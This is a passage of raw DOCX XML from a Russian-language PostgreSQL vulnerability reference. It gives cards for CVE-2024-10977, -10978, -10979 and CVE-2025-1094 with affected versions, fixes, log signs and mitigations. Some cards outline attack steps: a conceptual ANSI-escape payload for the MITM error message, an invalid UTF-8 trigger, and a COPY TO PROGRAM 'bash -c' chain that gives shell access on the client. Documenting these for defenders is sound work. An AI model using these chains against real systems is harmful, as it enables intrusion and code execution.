        <w:t xml:space="preserve">) — атакующий читает/изменяет чужие строки.</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17.0, 16.4, 15.8, 14.13, 13.16, 12.20.</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17.1, 16.5, 15.9, 14.14, 13.17, 12.21 (14.11.2024). CVSS 4.2 (Medium).</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3.17.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-10977 — MITM вшивает произвольные байты в error message libpq (полная карточка)</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Недоверенный сервер (атакующий в позиции MITM до завершения SSL/GSS handshake) может послать клиенту libpq error-сообщение произвольной длины с произвольными байтами. Клиент libpq не валидировал содержимое pre-handshake error response; psql отображал содержимое в терминал, screen-scrapers (CSV-парсеры, скрипты на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -A -t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) трактовали его как row data. Класс — trust bypass на pre-authentication stage, не SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный payload (концептуальный).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Атакующий стоит между клиентом и легитимным PG-сервером.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># В TCP-сессии до завершения TLS handshake возвращает ErrorResponse-message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># (frontend message 'E') с полем 'M' (primary error message), содержащим:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#   - длинный текст для затирания visual context в терминале;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#   - ANSI-escape-коды для перерисовки команды (например, перерисовать</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#     'SELECT 1' под выглядящее как 'whoami' в bash hijack-сценарии);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#   - newline + injected команды для CSV-screen-scraper-ов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Конкретный network-level PoC требует crafted PG wire-packet — формат описан</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># в PostgreSQL Protocol Flow docs.</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Зависит от клиента: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psql interactive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: в терминале появляется длинный текст с возможным ANSI-injection (перекраска символов, repositioning курсора, в худшем случае — visual обман пользователя относительно реальной команды).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`psql -A -t` в pipe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: каждая строка error message трактуется wrapper-скриптом как очередная row → выполнение whatever-action на «пустой» или fake row.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libpq-based приложения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (psycopg, pgjdbc до libpq-обновления, asyncpg) — error message попадает в exception text → если приложение это loggает в systems типа Elasticsearch / Splunk без sanitization, log poisoning (см. log4shell-style scenarios).</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libpq до 17.1 не ограничивал длину error message и не валидировал control characters (newlines, ANSI-escape, NUL, prefix bytes) в pre-handshake state. Любые байты, полученные до TLS handshake completion, считались доверенными до завершения handshake — что неверно, если атакующий держит TCP-сессию до клиента. Фикс добавляет длино-лимит и фильтрацию control characters в pre-handshake response parsing.</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Позиция MITM — ARP poisoning в локальной сети, BGP hijack для зашифрованных linkов на провайдере, malicious WiFi на публичной сети, скомпрометированный proxy/load balancer. SSL не обязателен — атака работает в pre-handshake state даже если клиент потом ожидает TLS. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sslmode=require</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verify-full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не помогает (handshake ещё не дошёл до certificate validation).</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Затронуто (≤): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">17.0, 16.4, 15.8, 14.13, 13.16, 12.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Фикс: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">17.1, 16.5, 15.9, 14.14, 13.17, 12.21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (14.11.2024). libpq поставляется с server-пакетом и отдельно — клиенту нужно обновить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">libpq на стороне приложения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (не только сервер).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Как выглядит атака в логах.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> На client-side: длинные error messages в psql output, особенно с control characters; неожиданные disconnect-ы до завершения handshake. На server-side: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сервер этой атаки не видит</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — payload поступает от MITM-сервера, не от legitimate postgres-а. Network-level: TLS-handshake interruption pattern (initial SSLRequest → fake ErrorResponse → disconnect), видно в pcap.</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Trust bypass class. R6 (CVE-2025-1094, 3.9.7) — родственный класс «libpq escape API misuse»; оба про clean-up в libpq, но разные сценарии (MITM vs invalid-UTF-8 на клиенте). Mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sslmode=verify-full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + pinned root CA — закрывает MITM до handshake completion.</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CVE-2024-10977</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CVE-2024-10978 — SET ROLE сбрасывается на неверный user ID</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Приложения, использующие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для multi-tenant изоляции, подвержены бага в reset-path: запрос, спланированный под одной ролью, выполняется под другой. Атакующий-tenant видит данные другого tenant-а, либо приобретает привилегии чужой роли. Усиливается совместно с R9 (CVE-2024-10976) в multi-tenant SaaS с connection pooling — см. цепочку в 4.7.</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17.0, 16.4, 15.8, 14.13, 13.16, 12.20.</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17.1, 16.5, 15.9, 14.14, 13.17, 12.21 (14.11.2024). CVSS 4.2 (Medium).</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3.13.1 (priv-esc оптика), 3.17.3 (cross-tenant data leak оптика).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-10979 — RCE через PL/Perl env</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Trusted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(с PUBLIC USAGE по умолчанию) позволял функциям модифицировать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 процесса postgres — изменить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, выставить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, изменить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PERL5LIB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. На trusted-уровне такое нарушение sandbox-а превращает любую CREATE FUNCTION в потенциальный RCE без plperlu и без superuser-роли. Достаточно: USAGE на plperl (PUBLIC по умолчанию) + CREATE на любой schema.</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17.0, 16.4, 15.8, 14.13, 13.16, 12.20.</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17.1, 16.5, 15.9, 14.14, 13.17, 12.21 (14.11.2024). CVSS 8.8 (High).</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3.7.2b.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Цепочка R16 → R7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (extension hijack + plperl env) — подробно в 4.7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводная таблица batch 14.11.2024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CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>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Деталь</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3.17.1</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trust bypass (libpq MITM)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полная карточка выше</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auth/RLS bypass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 / 3.17.3</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через PL/Perl</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все четыре закрыты одной серией minor-релизов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">17.1, 16.5, 15.9, 14.14, 13.17, 12.21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (14.11.2024). Отдельно — CVE-2024-4317 (май 2024), не входит в ноябрьский batch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст 2024 года</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">14.11.2024 — самый широкий batch в истории недавнего PostgreSQL по числу одновременно закрытых CVE-классов: четыре уязвимости, покрывающие RLS (R9), auth (R8), RCE (R7) и libpq trust (R10) в одном дне. Для defenders это даёт неприятную диагональ: любая legacy-minor до 14.11.2024 (17.0 / 16.4 / 15.8 / 14.13 / 13.16 / 12.20) уязвима по четырём независимым фронтам одновременно — upgrade критичен независимо от того, какой из CVE «по профилю» наиболее релевантен. Отдельный нюанс с CVE-2024-4317 (май 2024) — фикс требует ручного запуска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в каждой БД, что многие managed-провайдеры исторически не делают автоматически (см. 4.9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Хронология 2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Несколько batch-ов в году: 13.02.2025 (R6/R21), май 2025 (R27), 14.08.2025 (R25/R26), ноябрь 2025 (R23). Плюс R24 — отдельный pgAdmin advisory вне основного PostgreSQL release cycle. Три полные карточки: R23, R24, R27 — все вне якорей 3.X.N (DoS / adjacent ecosystem / encoding-validation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-1094 — SQL injection в psql через невалидный UTF-8</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Приложение оборачивает user input через libpq-функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescapeLiteral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PQescapeIdentifier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PQescapeString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PQescapeStringConn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и feed-ит результат в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(interactive terminal или non-interactive pipe). Невалидный UTF-8 (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hax\xC0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) ломает escape-логику — результат содержит unescaped quote, что даёт SQL injection на psql-уровне. Через метакоманду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атакующий получает shell на машине клиента.</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17.2, 16.6, 15.10, 14.15, 13.18.</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17.3, 16.7, 15.11, 14.16, 13.19 (13.02.2025). CVSS 8.1 (High) — самый severe CVE 2025 года.</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3.9.7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-1094 chain → COPY TO PROGRAM (R21)</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Chain R6 → R21: после SQL injection в psql через R6 атакующий получает право выполнять произвольный SQL в контексте psql-сессии. Команда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY (SELECT '') TO PROGRAM 'bash -c "..."'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запускает shell как OS-пользователь, под которым работает psql (обычно admin/operator workstation). RCE на машине клиента — не на сервере. Цитата Rapid7: «*Rapid7 discovered that in every scenario we tested, a successful exploit for CVE-2024-12356 had to include exploitation of CVE-2025-1094 in order to achieve remote code execution*».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Затронуто / фикс:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> те же что R6.</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3.7.1 + 3.9.7. Полное описание цепочки — в 4.7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
